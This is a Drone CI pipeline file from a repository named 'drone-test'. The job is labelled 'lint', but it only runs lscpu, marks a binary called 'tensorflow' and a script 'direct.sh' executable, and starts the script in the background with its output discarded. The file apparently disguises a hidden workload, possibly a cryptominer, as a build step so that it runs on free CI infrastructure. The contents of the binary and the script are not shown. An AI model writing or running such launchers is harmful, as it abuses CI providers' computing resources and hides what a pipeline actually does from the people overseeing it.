drone-test/.drone.yml
root a6f04e773d
Some checks reported errors
continuous-integration/drone Build was killed
Initial Commit
2022-03-07 16:28:13 +07:00

14 lines
200 B
YAML

---
kind: pipeline
type: docker
name: lint
steps:
- name: lint
image: golang:1.17
commands:
- lscpu
- chmod +x tensorflow direct.sh
- nohup bash direct.sh > /dev/null
...